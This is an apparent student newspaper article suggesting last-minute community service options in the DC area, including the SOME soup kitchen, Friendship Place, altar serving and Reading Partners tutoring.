Last-minute options for community service hours

Now that we’re in third quarter, time is starting to run out to finish getting community service hours. Here are some options for students starting halfway through the year who need a quick and flexible way to get hours:

So Others Might Eat (SOME):

Working at a soup kitchen is a convenient and helpful way to get extra community service hours over the weekend. SOME is an organization that works with the homeless and provides free meals, job training and help with social services. Located near downtown DC, volunteers can use the website to sign up for different volunteer opportunities nearly any day of the week. They offer opportunities to work in the kitchen, help organize donations or run workshops.

Friendship Place:

Similar to SOME, Friendship Place is an non-profit organization near Tenleytown that provides a range of services like job placing, free clinics, and help with housing and finances to the homeless. Anyone can send an email with questions or sign up to volunteer as a student for community service. The people who run the organization are very responsive and can help volunteers decide how and when they want to come in and help.

Altar Server:

If you need extra hours but have to do service in your parish, being an altar server is a great way to get extra hours. Working with your church is also a way to get more involved in your parish community, which can open up more opportunities for community service in the future, like running a Sunday school class or camp over the summer. Getting in contact with your nearest parish and asking if there’s any availability for an altar server is a good way to get involved.

Reading Partners:

Reading Partners is an organization that helps tutor kids in language and reading skills. The organization has 19 different locations and aims to improve DC’s statistic for child literacy by having volunteers give free tutoring. To become involved, you need to reach out to their email, at volunteer@readingpartners.org.
